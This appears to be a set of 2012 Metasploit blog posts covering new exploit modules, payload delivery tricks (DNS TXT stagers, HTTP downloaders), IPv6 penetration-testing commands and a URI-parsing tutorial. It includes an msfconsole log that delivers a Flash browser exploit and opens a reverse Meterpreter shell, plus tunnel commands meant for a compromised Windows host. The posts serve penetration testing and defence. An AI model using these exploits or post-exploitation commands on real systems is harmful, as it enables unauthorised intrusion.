
Recently, Microsoft published a blog post regarding a Java exploit that's being used in the wild. The vulnerability is more of a logical flaw that results in unsafe operations, which allows any attacker to run arbitrary code under the context of the user. You may see the blog here:

http://blogs.technet.com/b/mmpc/archive/2012/03/20/an-interesting-case-of-jre-sandbox-breach-cve-2012-0507.aspx

About two days ago, Metasploit obtained a partial sample of that malware thanks to an anonymous contributor. Frequent Metasploit contributor Juan Vazquez and I then embarked on a 24 hour codeathon to produce a working module, committed to the tree moments ago:

[Screenshot: the new module run against multiple target platforms]

Like Microsoft suggested, the exploit should be very reliable across different systems. In the above screenshot, we tested the exploit against different platforms from Windows XP, Windows 7, all the way to Ubuntu and OSX. As long as your target has the vulnerable version of Java, this exploit should get you shells.

To have a play with this and all our other fun exploits, download the free Metasploit Community Edition here. We'll be hosting a webcast on April 25th to discuss this and other Java security concerns. Save the date and watch this space for more info!

This week we've got a nifty new shellcode delivery scheme, we've normalized on Exploit-DB serial numbers, and a pile of new modules, so if you don't have Metasploit yet, you can snag it here.

DNS Payloads in TXT Records

To quote RFC 1464 describing DNS TXT records, "it would be useful to take advantage of the widespread use and scalability of the DNS to store information that has not been previously defined." I don't know about you, but to me, that sounds like a description for a universal shellcode delivery system. For this week's update, that's exactly what Peter "corelanc0d3r" Van Eeckhoutte has provided. Provided your target can make DNS queries against a domain you control, you can shuttle your alpha-encoded payload into an unwary DMZ or internal network.

The techniques for smuggling arbitrary data over DNS have been discussed for a little while now -- for example, Ty Miller proposed using rDNS to deliver shellcode as part of a client exploit back in 2008. Corelanc0d3r's payload stager makes things tons easier for pen-testers who would like to highlight this particular exposure. As with most of his updates, corelanc0d3r's payload itself makes heavy use of comment documentation, so I encourage you to check it out if you'd like to learn the details.

Also, in a related line of research, open source contributor Chris John Riley has provided a Rex library port of Samuel Tesla's Base32 encoder. While there isn't anything in the source tree that yet uses it, the astute reader can see where this is going. Thanks both to CJR and corelanc0d3r for some great work!

 

New EDB References

[Screenshot: search results for EDB-18280]

Today, we have over 130 modules in Metasploit that reference an Exploit-DB proof of concept exploit. These guys do some great work at archiving publicly available exploit code, and Exploit-DB has grown into a super-useful public resource for exploit writers and security researchers alike. So, as of this update, it's now much easier to search for exploits based on their Exploit-DB serial number.

As seen in the screenshot, searching for "EDB-18280" brings up three Metasploit modules that reference that particular Telnet exploit, and "search EDB-18280" in msfconsole returns an equivalent list. For module developers, this can be a quick way to tell if a) a Metasploit module exists for that PoC yet, and if so, b) how Metasploit's implementation differs from the public PoC.

Additional Modules

As to be expected, we also have a smattering of new modules for this week's update.

  • hp_data_protector_cmd, by c4an, wireghoul, and sinn3r, exploits CVE-2011-0923 for HP Data Protector.
  • manageengine_traversal, by sinn3r, exploits OSVDB-80262 for ManageEngine DeviceExpert.
  • freepbx_callmenum, by muts and Martin Tschirsich, exploits EDB-18649 for FreePBX.
  • ms10_002_ie_object, by sinn3r and Juan Vazquez, exploits MS10-002 for Internet Explorer.
  • ricoh_dl_bof, by sinn3r, exploits OSVDB-79691 on Ricoh DC's DL-10.
  • ultravnc_viewer_bof, by noperand, exploits CVE-2008-0610 for UltraVNC.
  • enum_airport, by sinn3r, is a post module which collects data from a target's local AirPort preferences.
  • enum_chicken_vnc_profile, by sinn3r, is a post module which collects a target's "Chicken of the VNC" profile.

Availability

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

For additional details on what's changed and what's current, please see Jonathan Cran's most excellent release notes.

This post details some of the tools used in my recent IPv6 security testing webcast. If you have any specific questions, please open a Discussion thread.

A minimal IPv6 toolbox:

The BackTrack Linux distribution includes these tools by default and is a great choice.

On your local Linux distribution, the following tools are useful:

  • ping6
  • tracepath6
  • socat
  • ip6tables
  • tcpdump
  • wireshark

Scanning your local subnet for all IPv6-enabled systems in one shot:

# nmap -6 --script=targets-ipv6-multicast-*

Port scanning the top 10000 ports on these assets:

# nmap -6 --script=targets-ipv6-multicast-* --script-args=newtargets -PS --top-ports=10000

Targeting a link-local address from within Metasploit (assuming the NIC is eth0):

msf exploit > set RHOST fe80::7aac:c2ff:fe3d:e003%eth0


Targeting all IP addresses (IPv4 and IPv6) tied to a hostname via DNS with a Scanner module:

msf scanner> set RHOSTS my.host.name

If you would like a global IPv6 address, these free services can tunnel over IPv4:

Bringing up a tunnel via Hurricane Electric's TunnelBroker service is simple:

Linux

ifconfig sit0 up

ifconfig sit0 inet6 tunnel ::<TunnelBrokerGateway>

ifconfig sit1 up

ifconfig sit1 inet6 add <TunnelBrokerPrefix>::2/64

route -A inet6 add ::/0 dev sit1


Bringing up a tunnel via TunnelBroker on a compromised Windows target:

Windows 2000/XP


ipv6 install

ipv6 rtu ::/0 2/::<TunnelBrokerGateway> pub

ipv6 adu 2/<TunnelBrokerPrefix>::2

Windows Vista/2008/7


netsh interface teredo set state disabled

netsh interface ipv6 add v6v4tunnel IP6Tunnel <TargetExternalIP> <TunnelBrokerGateway>

netsh interface ipv6 add address IP6Tunnel <TunnelBrokerPrefix>::2

netsh interface ipv6 add route ::/0 IP6Tunnel <TunnelBrokerPrefix>::1



For information on malicious Teredo configuration on Windows, please see this fine article.

Remember to configure a firewall (ip6tables or Windows FW) in either case.


-HD

After a couple of relatively light weeks (blame SXSW, I guess), this week's update has quite a few neat new additions. As always, if you don't already have Metasploit, what are you waiting for? For the rest of us, here's what's new.

Importapalooza

This week's update has support for importing asset lists exported from Spiceworks, courtesy of Rapid7's Brandon Perry. Spiceworks is a free asset management application used by tons of IT pros and IT amateurs alike, and Metasploit can now take the Spiceworks export that small and medium business folks use -- specifically, the results of the "Spiceworks Inventory Summary CSV export" -- and turn that into a target list of IP addresses. This brings the total number of supported import formats Metasploit can handle to 23 (including libpcap, nmap XML, Nessus, Qualys, Nexpose of course, and a pile of others).

More interestingly, I believe it's the first non-security-centric asset management format we cover. If you have a favorite asset management tool that produces some kind of parsable report (XML, CSV, or whatever), we'd love to see a sample of the output, or even better, a pull request to handle the format along with your sample.

Apple Filing Protocol

Community contributor Gregory Man added support for the Apple Filing Protocol (AFP) this week, in support of his afp_login module, adding to the parade of authentication protocols that Metasploit supports. While AFP is a relatively simple protocol in the scheme of things (it's small, nicely documented, and common), actually implementing any new wire protocol in pure Ruby is no small task. Thanks a ton for that, Gregory!

The MS12-020 RDP "Exploit"

[Screenshot: bluescreen produced by the MS12-020 denial-of-service module]

This week, there was some small amount of buzz over at ThreatPost around Wei "sinn3r" Chen's addition of the denial-of-service module ms12_020_maxchannelids. Various Metasploit contributors and other security researchers got together over the weekend on Freenode IRC to see if they couldn't put together a proper exploit for the vulnerability patched by MS12-020 based on publicly-available information. This module is certainly not the end of that story -- it's somewhere in the middle, really. It does exercise the vulnerability, though, and crashes the target with a bluescreen, so defenders can use this module to get an idea of what to look for when detecting a "real" exploit, and exploit writers can refer to it for guidance in case they missed the IRC pow-wow.

On the right, you see a screenshot of a BSOD when this vulnerability is exploited. If one of your servers bluescreens detailing RDPWD.SYS, you may be under attack by a Terminal Services mischief maker.

New HTTP Downloader Payload

Finally, this week we've committed Peter "corelanc0d3r" Van Eeckhoutte's new HTTP downloader payload, windows/download_exec_https. The name is a little misleading, though, because it supports HTTP, HTTPS, and FTP protocols, as it uses the native InternetConnectA functionality in Microsoft's standard wininet.dll, and that guy handles all three.

It seems to work pretty well on all the platforms we tested, so if you're already using windows/download_exec to deliver executables to exploited targets, you might want to give this one a shot. The option syntax is identical, so it should just be a matter of swapping out one for the other. The module itself is much better documented internally than the old download_exec standby, so it's a little less mysterious as to what's going on. Thanks for all the work on this, corelanc0d3r!

Additional New Modules

  • netdecision_traversal, by sinn3r, exploits OSVDB-79863 found in NetDecision's NOCVision Server.
  • netdecision_http_bof, by sinn3r, exploits OSVDB-79651 found in NetDecision's HTTP service.
  • sockso_traversal, by sinn3r, exploits BID-52509 in Sockso's Music Host Server.
  • dell_webcam_crazytalk, by sinn3r, exploits OSVDB-80205 in Dell's WebCam CrazyTalk ActiveX control.
  • rails_mass_assignment, by Gregory Man, exploits the mass-assignment Rails configuration error recently discussed on GitHub.
  • enum_protections, by ohdae, details the security software installed on a target Linux machine.
  • enum_adium, by sinn3r, interrogates Mac OSX's built-in chat client Adium for account info and chat logs.

In addition, some post modules were shuffled and recombined to be more immediately useful for end users -- most of this work was by ohdae and sinn3r:

  • enum_system combines the functionality previously a part of enum_cron, enum_services, enum_packages, as well as some of the functions in enum_linux.
  • The rest of enum_linux was broken out into the post modules enum_configs, enum_network, and enum_users_history.

Availability

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

For additional details on what's changed and what's current, please see Jonathan Cran's most excellent release notes.

It's another Metasploit update, and it's headed straight for us!

Session Smarts

This week, Metasploit session management got a whole lot smarter. Here's the scenario: As a penetration tester, you rook a bunch of people into clicking on your browser-embedded Flash exploit, sit back, and watch the sessions rolling in. However, they're all behind a single NAT point, so all your sessions appear to be terminating at a single IP address, and you quickly lose track of who's who in your session list.

Over the last couple weeks, Rapid7's own HD Moore and James "egypt" Lee have solved that problem by giving Meterpreter sessions the smarts to figure out that the IP address they were delivered to isn't the same as the IP address they ended up on by comparing the local interface address with what it thought it was headed to. So, the end result is, if you've got sessions behind a NAT or something similar, you can now at least tell the difference between end points that are otherwise cloaked by NAT. Here's an example of a local attacker (192.168.168.10) connected to a remote victim (10.1.1.101) who is behind a NAT gateway (192.168.168.13):

msf exploit(handler) > sessions

Active sessions
===============

  Id  Type               Information                       Connection
  --  ----               -----------                       ----------
  6   meterpreter win32  SITTINGDUCK\darkwing @ WEBSPHERE  192.168.168.10:9999 -> 192.168.168.13:26641 (10.1.1.101)

msf exploit(handler) > hosts

Hosts
=====

address         mac  name       os_name            os_flavor    os_sp  purpose   info  comments
-------         ---  ----       -------            ---------    -----  -------   ----  --------
10.1.1.101           WEBSPHERE  Microsoft Windows  .NET Server  SP2    client          
192.168.168.13                                                         firewall        

msf exploit(handler) >

GitHub Care and Feeding

These last couple weeks have been dedicated to cleaning up a lot of our own internal processes around GitHub. For starters, we've been clearing out a lot of the older framework fixes that have been lingering in the queue, and by the end of the week, we should be in a pretty good spot as far as backlog is concerned. Going forward, I have sworn a blood oath to keep that backlog down to a week's worth of pull requests.

Module management hasn't been too much trouble, seeing how Wei "sinn3r" Chen is an android from the future who can process community modules at insane speeds. Integrating the more complex framework patches, plugins, and other non-module contributions has been a little slower than I'd like in this post-Redmine world, and the longer those get put off, the harder it is to merge them in. By this time next week, you shouldn't see any outstanding pull requests more than a couple days old.

Speaking of Redmine, we're also just about ready to move our issue tracking over to GitHub. Right now, if Metasploit users run into a bug or have a feature request, we are still using the old dev.metasploit.com bug tracker, and that means users need to log in over there, too, which is kind of a hassle. We'd rather have one unified place to track issues and patches together (for obvious reasons), so look for the Redmine tracker to go away Real Soon Now.

Availability

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

For additional details on what's changed and what's current, please see Jonathan Cran's most excellent release notes.

You may remember the awesome Metasploit T-shirt contest we ran in April of last year. We received a ton of submissions at the time and selected a winning T-shirt, designed by Danny Chrastil.

It was a long and arduous journey for us to get the T-shirts printed and to get the back-end systems up and running for the Metasploit Swag Store... but it's finally here. Yes, you'll notice that the T-shirt design is a little bit different than last year, but we're confident it'll look just as good on you as the previous one.

Those of you who've been eagerly awaiting the Metasploit store launch will be glad to hear that @egypt made me use the office chair on the right until the Metasploit Swag Store was up... I have a high tolerance for pain. You can imagine that I'm extremely happy to report that it is now available. Big thanks to the supporting team at Rapid7 for making this happen!

To get started, we're testing out the new store with three items; we'll add more products and designs if many of you decide to swipe your credit cards. We are happy to announce that a portion of the profits from the store will go to one of Rapid7's favorite non-profit organizations, Hackers for Charity. Here's what we've got on the shelves for you:

[Photos: Metasploit T-shirt, front and back]

Metasploit T-Shirt "Hex Code"

Designed by Danny Chrastil, this is the winner of the Metasploit T-shirt competition.

  • Front: the hex code from "msfpayload osx/ppc/shell_reverse_tcp" in the background of the Metasploit logo.
  • Back: The Metasploit magic pwning power cow
  • Fabric: Hanes Adult Tagless Short-Sleeve Beefy-T®; preshrunk 100% ring-spun cotton; 6.1-oz.; high-stitch-density fabric
  • Lay-flat collar; shoulder-to-shoulder taping; double-needle cover-seamed neck; double needle sleeves and bottom hems

[Photo: Metasploit baseball hat]

Metasploit Baseball Hat

Wear your allegiance to Metasploit on your forehead

  • Color: Black
  • 6-panel baseball hat with embroidered Metasploit logo on the front
  • Low profile 6 panel structured cap
  • Lightweight brushed cotton twill
  • Fabric strap with two piece velcro
  • Fabric weight 6 oz.

[Photos: Metasploit solar computer backpack]

Metasploit Solar Computer Backpack

Finally a good reason to spend more time in the sun (watch video)

  • Fits laptops up to 14"
  • USB adapter, USB charger, AC charger
  • 3600 MAH battery and multiple adapters for charging iPod, iPhone, Blackberry and most other smartphones
  • Front has solar panel, zippered pocket with multi-function accessories organizer
  • Large main compartment
  • Viewpoint System computer sleeve with detachment buckle and clear window
  • 1600 denier ballistic / 420 denier honeycomb, embroidered with Metasploit logo

Now's your chance to win a Metasploit T-shirt. Simply tweet the following sentence before March 30th to enter:

Need some new threads? Get your geek on at the new Metasploit Store: http://bit.ly/hw3CUT #metasploitswag


Don't let that stop you from ordering your shirt now. If you win, we'll refund you the money!

If you want to check out the goods, visit the new Metasploit Swag Store!

I have to admit, parsing a URI is tricky. Most Metasploit modules try to do it with some kind of crazy custom regex-fu, but unfortunately most of them are kind of buggy. Because of this, I've committed a new patch to HttpClient -- a target_uri function that can automatically parse the URI for you. It's only a 4-line change, but should change the way we code HTTP-related modules.

Before I demonstrate how you can take advantage of target_uri, I should briefly explain why you should avoid doing this manually. First off, the URI structure looks like this:

Scheme | Hierarchical URI indicator | Credential | Host | Port | Path to resource | Query string | Fragment

  • Scheme: A string that indicates the protocol, such as: http, https, smb, ftp, etc.
  • Hierarchical URI indicator: Optional. A string of "//".
  • Credential: Optional. In this format: username:password@
  • Host: An address to the server (note this can be IPv4, IPv6, 32-bit integer, etc.)
  • Port: Optional. This is pretty self-explanatory.
  • Path To Resource: A directory or file path. This is trickier than you think, because how do you determine if "test" is a directory, or a file? Keep in mind that when you do "set TARGETURI test" in a browser exploit in Metasploit, 'test' is treated as a directory, not a file.
  • Query String: Optional. Pretty much anything that comes after "?".
  • Fragment: Optional. Pretty much anything that comes after "#".

RFC-3986 covers the generic URI syntax pretty well in case you'd like to read up more, but as you can see, it's really a lot of hassle to break it down. To ease this process, we came up with a simple solution by using Ruby's stdlib -- or to be specific, the URI module. The following is a basic usage example:

require 'msf/core'

class Metasploit3 < Msf::Auxiliary

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'URI test case',
      'Description' => %q{This module tests the target_uri function},
      'Author'      => [ 'sinn3r' ],
      'License'     => MSF_LICENSE
    ))

    register_options(
      [
        # You must use TARGETURI, or target_uri won't work
        OptString.new('TARGETURI', [true, 'The URI Path', '/cms/index.php?page=1&cmd=id'])
      ], self.class)
  end

  def run
    uri = target_uri
    print_status(uri.inspect)
  end
end

The above example should return something like this:

msf  auxiliary(test_case) > run
[*] #<URI::Generic:0x0000010c8c05e8 URL:/cms/index.php?page=1&cmd=id>

To retrieve just the resource path, you can simply do this (note: if there's no path, you will get nil, so make sure you handle that properly. The same goes for scheme, port, query, fragment, etc.):

uri = target_uri
print_status(uri.path)  # We get "/cms/index.php"

If you want the query string (or a specific parameter), here's another trick on how to handle it:

require 'msf/core'

class Metasploit3 < Msf::Auxiliary

  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::WmapScanUniqueQuery

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'URI test case',
      'Description' => %q{This module tests the target_uri function},
      'Author'      => [ 'sinn3r' ],
      'License'     => MSF_LICENSE
    ))

    register_options(
      [
        # You must use TARGETURI, or target_uri won't work
        OptString.new('TARGETURI', [true, 'The URI Path', '/cms/index.php?page=1&cmd=id'])
      ], self.class)
  end

  def run
    uri = target_uri
    # queryparse comes from WmapScanUniqueQuery; guard against a nil query
    query = queryparse(uri.query || "")
    param_page = query['page']
    param_cmd  = query['cmd']

    print_status("Query is a #{query.class}")
    print_status("Page is: #{param_page}")
    print_status("CMD is : #{param_cmd}")
  end
end

And this gives us the following output:

msf  auxiliary(testme) > rerun
[*] Reloading module...

[*] Query is a Hash
[*] Page is: 1
[*] CMD is : id
[*] Auxiliary module execution completed

And that's it for now. In case you're interested in other HttpClient functions, please feel free to check out the following documentation:

http://dev.metasploit.com/documents/api/
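As an added example (not code from the post, and not Metasploit's own HttpClient or WmapScanUniqueQuery implementation), here is a target_uri-style parser built on the same stdlib URI module, returning nil for absent components the way the post warns about, defaulting the path, and exercising the cases a hand-rolled regex tends to get wrong: credentials, bracketed IPv6 hosts, fragments and repeated query keys. ParsedTarget, parse_target, queryparse and as_directory are names made up for this example.

```ruby
# Added example, not code from the post or from Metasploit: a target_uri-style
# parser on top of Ruby's stdlib URI, with explicit handling of the nil cases.
require 'uri'

ParsedTarget = Struct.new(:scheme, :userinfo, :host, :port, :path, :query, :fragment)

# Equivalent of the post's queryparse: "page=1&cmd=id" -> {"page"=>"1", "cmd"=>"id"}.
# A repeated key collects its values into an Array instead of silently overwriting,
# and a nil query (no "?" in TARGETURI) yields an empty Hash rather than an error.
def queryparse(query)
  result = {}
  URI.decode_www_form(query.to_s).each do |key, value|
    result[key] = result.key?(key) ? Array(result[key]) << value : value
  end
  result
end

# Parse a TARGETURI-style string. Absent components come back nil, except :path,
# which defaults to "/" because an HTTP request line cannot carry an empty path,
# and :query, which is always a Hash. Bracketed IPv6 hosts keep their brackets.
def parse_target(str)
  uri = URI.parse(str)
  path = (uri.path.nil? || uri.path.empty?) ? '/' : uri.path
  ParsedTarget.new(uri.scheme, uri.userinfo, uri.host, uri.port, path,
                   queryparse(uri.query), uri.fragment)
end

# The post notes that "set TARGETURI test" is treated as a directory, not a file;
# this helper models that convention by guaranteeing a trailing slash.
def as_directory(path)
  path.end_with?('/') ? path : path + '/'
end

if __FILE__ == $PROGRAM_NAME
  ['/cms/index.php?page=1&cmd=id', 'test', 'http://host',
   'https://admin:s3cret@[fe80::1]:8443/?a=1&a=2#frag'].each do |s|
    puts "#{s.inspect} => #{parse_target(s).to_h.inspect}"
  end
end
```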

In addition to the nuclear-powered exploit, we've got a new slew of updates, fixes and modules this week for Metasploit, so let's jump right into the highlights for this update.

Updated WMAP Plugin

Longtime community contributor Efrain Torres provided a much-anticipated update to the Wmap plugin. Wmap automates a bunch of web-based Metasploit modules via the Metasploit console, from HTTP version scanning to file path bruteforcing to blind SQL injection testing. If you're not already familiar with Wmap, feel free to download the latest Metasploit installer and give it a whirl against Metasploitable or your preferred test environment. It's pretty exhaustive stuff, so for more details on what all you can do with Wmap, Read the Fine Material here.

Msfconsole Searching

We've also picked up a set of patches from contributor RageLtMan to make searching from the console interface a lot easier. By using the -S (note the capital) option for the "hosts", "services", "vulns", "creds", "notes", and "loot" commands, users can now pass a search term to filter the result set on. This makes working in the console directly somewhat easier to manage when you have several hosts with several services in your penetration testing target list. For example, by simply passing "services -S dropbear" you will display only those services that mention the DropBear SSH service. Pretty handy, so thanks for that, RageLtMan!

New Modules

As to be expected, this update comes with a passel of new and exciting exploits, auxiliary modules, and even a new payload.

  • afp_server_info, an auxiliary module from Gregory Man, interrogates Apple Filing Protocol (AFP) servers for banner information by parsing out the initial encoded responses.
  • mongodb_login, also from Gregory, bruteforces MongoDB services on the off chance one has a user and password configured -- it usually doesn't.
  • asus_net4switch_ipswcom exploits OSVDB-79438, a vulnerability in the ASUS Net4Switch ActiveX control (by sinn3r).
  • djstudio_pls_bof exploits CVE-2009-4656, a file format vulnerability in DJ Studio Pro (by Sebastien Duguette and Death-Shadow-Dark).
  • ibm_pcm_ws exploits CVE-2012-0201, a file format vulnerability in IBM's Personal Communications iSeries (by TecR0c, with surprisingly thorough description documentation, so thanks TecR0c!).
  • sysax_ssh_username, a remote, pre-authentication exploit for OSVDB-79689 in Sysax SSH server for Windows (by sinn3r).
  • vlc_realtext, a file format vulnerability in VLC Media player (by Juan Vazquez). The original vulnerability was discovered by Tobias Klein, author of A Bug Hunter's Diary, but this is not the VLC vulnerability discussed in that book -- this one was from a couple months prior, so it might add a little more context to BHD.
  • apple_ios_backup, by HD Moore and bannedit, is a post module which snags sensitive data from an iOS backup. This was previously a Windows-only post module, but has been upgraded to operate on OSX targets as well.

In addition to these, we're shipping a new payload for ARM-based Linux systems, shell_bind_tcp (by civ and hal), which opens a listening TCP port using native ARM shellcode. I got a chance to use a pwnie express to test it out, which is a totally fun device to mess around with. The shellcode works like a champ, so that whole testing experience was pretty fun and enlightening.

Availability

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

For additional details on what's changed and what's current, please see Jonathan Cran's most excellent release notes.

Over the last couple days, Metasploit's own Wei "sinn3r" Chen and community contributor Juan Vazquez put together an exploit for CVE-2012-0754, which targets a vulnerability in Adobe's Flash player: adobe_flash_mp4_cprt. This is the same vulnerability exploited by the recent "Iran's Oil and Nuclear Situation.doc" e-mail attack campaign spotted by Contagio on March 5. After getting a hold of the reported malware from an anonymous contributor, sinn3r and Juan were able to determine what exactly triggers the Adobe Flash bug, and thus, were able to put together a more general-purpose exploit and incorporate it into Metasploit.

Today, we have a full Internet Explorer-based exploit, operational against IE 6, 7, and 8, covering pretty much all modern and not-so-modern Windows XP and Microsoft Vista clients. In other words, this exploit provides an excellent opportunity to test out your organization's protections against fresh threats targeting a slightly out-of-date client base.

This is all significant because this Flash vulnerability has been publicly disclosed for only about three weeks, and it's unusual to see something like this show up so quickly in a live, untargeted e-mail attack campaign.

In addition, while the original exploit was strictly a Microsoft Word document based exploit (which itself was merely a downloader for the "real" payload), the Metasploit version is a proper browser-based exploit, and its usage is about as simple as it gets (detailed below). The moral of the story is, thanks to a working version of a Metasploit exploit for this relatively fresh vulnerability, security researchers, AV/IPS vendors, and IT administrators alike can take a look at the vulnerability and make the assessment if they and their constituency are adequately protected. Hooray for open source security research!

Usage Example

$ msfconsole
msf > use windows/browser/adobe_flash_mp4_cprt
msf exploit(adobe_flash_mp4_cprt) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(adobe_flash_mp4_cprt) > exploit
[*] Started reverse handler on 10.0.1.3:4444
[*] Using URL: http://0.0.0.0:8080/2Q0m2Zpti8wu
[*]  Local IP: http://10.0.1.3:8080/2Q0m2Zpti8wu
[*] Server started.
[*] 10.0.1.4:1797 Client requesting: /2Q0m2Zpti8wu
[*] Using msvcrt ROP
[*] 10.0.1.4:1797 /2Q0m2Zpti8wu/Exploit.swf
[*] Sending html to 10.0.1.4:1797...
[*] 10.0.1.4:1797 Client requesting: /2Q0m2Zpti8wu/Exploit.swf
[*] 10.0.1.4:1797 Sending Exploit SWF...
[*] 10.0.1.4:1797 Client requesting: /test.mp4
[*] 10.0.1.4:1797 Sending MP4...
[*] Sending stage (752128 bytes) to 10.0.1.4
[*] Meterpreter session 1 opened (10.0.1.3:4444 -> 10.0.1.4:1798)

msf  exploit(adobe_flash_mp4_cprt) > sessions

Active sessions
===============

  Id  Type                   Information  Connection
  --  ----                   -----------  ----------
  1   meterpreter x86/win32  XP\lab @ XP  10.0.1.3:4444 -> 10.0.1.4:1798 (10.0.1.4)

Patch Availability

Information regarding patch availability from Adobe can be found in their security bulletin, APSB12-03, and of course, end users are encouraged to apply appropriate patches as soon as it's convenient to do so.

Exploit Availability

This module will be part of this week's update (which is getting finished up as I write), and will be available (along with 800 other exploits) from the usual Metasploit download page. Of course, it's also already in the source tree, so if you're the bleeding-edge sort that already has Metasploit, it's just an msfupdate away.

IPv6 Infographic.pngWhat's your company doing to prepare for IPv6? Probably not an awful lot. While 10% of the world's top websites now offer IPv6 services, most companies haven't formulated an IPv6 strategy for the network. However, the issue is that most devices you have rolled out in the past 5 years have been IPv6-ready, if not IPv6-enabled. Windows 7 and Windows Server 2008 actually use IPv6 link-local addresses by default. Also think about all the other clients, servers, appliances, routers, and mobile devices you've added to your network in recent years. If you’re honest, how do you know that your network is not vulnerable to IPv6 attacks right now?


That's why even if you haven't set up an IPv6 network internally yet, you should test for IPv6 vulnerabilities. Here are some common security issues that you may find:

  • Misconfiguration: Not actively planning for IPv6 can introduce dangerous misconfiguration, such as a firewall that has filters set up for IPv4 traffic but accepts all IPv6 traffic. One organization we audited left zone transfers on their DNS server open for IPv6, but blocked for IPv4.
  • Uneven features: Many systems vendors are having to retrofit IPv6 into their products. Because Rome wasn't built in a day, IPv6 features often lag behind for a while. This uneven feature support for IPv6 can lead to security issues.
  • No IPv6 defenses: Some defense mechanisms, such as older IPS systems, may simply be blind to IPv6 traffic, letting it pass through without scrutiny.
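The first bullet is the kind of gap you can check for on the host itself, before any scanner runs. The following script is an added example (not Metasploit code, and not from the original post): it parses two packet-filter dumps in the text format that iptables-save and ip6tables-save print, and reports where the IPv6 filter is more permissive than the IPv4 one. Both dumps are constructed samples that reproduce the DNS anecdote above: tcp/53 (zone transfers) is restricted to one source network over IPv4 but open to anyone over IPv6, and the FORWARD chain accepts by default over IPv6 only.

```python
"""Cross-check IPv4 and IPv6 packet-filter rules for the 'filters set up for
IPv4 but not IPv6' misconfiguration.  Input is iptables-save / ip6tables-save
style text; IPV4_DUMP and IPV6_DUMP are constructed samples, not taken from a
real host.  Only the filter table's chain policies, protocol, destination port
and source are considered, which is enough to spot the common gaps."""
import re

IPV4_DUMP = """\
*filter
:INPUT DROP [0:0]
:FORWARD DROP [0:0]
:OUTPUT ACCEPT [0:0]
-A INPUT -i lo -j ACCEPT
-A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
-A INPUT -p tcp --dport 22 -j ACCEPT
-A INPUT -p udp --dport 53 -j ACCEPT
-A INPUT -p tcp --dport 53 -s 10.0.1.0/24 -j ACCEPT
COMMIT
"""

IPV6_DUMP = """\
*filter
:INPUT DROP [0:0]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
-A INPUT -i lo -j ACCEPT
-A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
-A INPUT -p tcp --dport 22 -j ACCEPT
-A INPUT -p udp --dport 53 -j ACCEPT
-A INPUT -p tcp --dport 53 -j ACCEPT
COMMIT
"""

POLICY_RE = re.compile(r"^:(\w+)\s+(ACCEPT|DROP|REJECT)\b")
RULE_RE = re.compile(r"^-A (\w+)\s+(.*?)\s*-j (\w+)\s*$")


def parse_filter(dump):
    """Return (policies, rules) for one dump.

    policies: chain name -> default policy
    rules:    list of (chain, proto, dport, source, target); fields a rule
              does not specify are None."""
    policies, rules = {}, []
    for line in dump.splitlines():
        m = POLICY_RE.match(line)
        if m:
            policies[m.group(1)] = m.group(2)
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        chain, body, target = m.groups()
        proto = re.search(r"-p (\w+)", body)
        dport = re.search(r"--dport (\d+)", body)
        src = re.search(r"-s (\S+)", body)
        rules.append((chain,
                      proto.group(1) if proto else None,
                      int(dport.group(1)) if dport else None,
                      src.group(1) if src else None,
                      target))
    return policies, rules


def world_open_ports(rules, chain="INPUT"):
    """(proto, dport) pairs ACCEPTed in `chain` with no source restriction."""
    return {(proto, dport) for c, proto, dport, src, target in rules
            if c == chain and target == "ACCEPT"
            and dport is not None and src is None}


def ipv6_gaps(v4_dump, v6_dump):
    """List findings where the IPv6 filter is more permissive than the IPv4 one."""
    findings = []
    p4, r4 = parse_filter(v4_dump)
    p6, r6 = parse_filter(v6_dump)
    for chain in ("INPUT", "FORWARD"):
        # chain drops by default over IPv4 but accepts by default over IPv6
        if p6.get(chain) == "ACCEPT" and p4.get(chain) in ("DROP", "REJECT"):
            findings.append("%s: policy ACCEPT over IPv6 but %s over IPv4"
                            % (chain, p4[chain]))
        if p6.get(chain) != "ACCEPT":
            # ports reachable from any source over IPv6 but not over IPv4
            for proto, port in sorted(world_open_ports(r6, chain)
                                      - world_open_ports(r4, chain)):
                findings.append("%s: %s/%s open to any source over IPv6 only"
                                % (chain, proto, port))
    return findings


if __name__ == "__main__":
    for finding in ipv6_gaps(IPV4_DUMP, IPV6_DUMP):
        print(finding)
```

To run it against a real host, feed the output of `iptables-save` and `ip6tables-save` into `ipv6_gaps()` in place of the two sample strings; the check is deliberately one-directional, since an IPv4 filter that is looser than the IPv6 one is a different (and usually already known) problem.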


Metasploit can now conduct penetration tests on IPv6 networks, so you can uncover these security issues yourself.


The new IPv6 support is now available in all current editions of Metasploit - download your latest copy now. Security researchers working on IPv6 vulnerabilities can now submit a Metasploit exploit or auxiliary module for use by the security community through Github.

If you're interested in more in-depth information, HD Moore is offering a free training on IPv6 security on March 28. Register now to get it on your calendar!

If you are doing security assessments, you are probably running into virtual servers every day. According to analyst firm Gartner, 80% of companies now have a virtualization project or program. With the recent 4.2 release of Metasploit, your next penetration test should be much more fun. For example, Metasploit now flags ESX Servers as virtual hosts in the user interface.

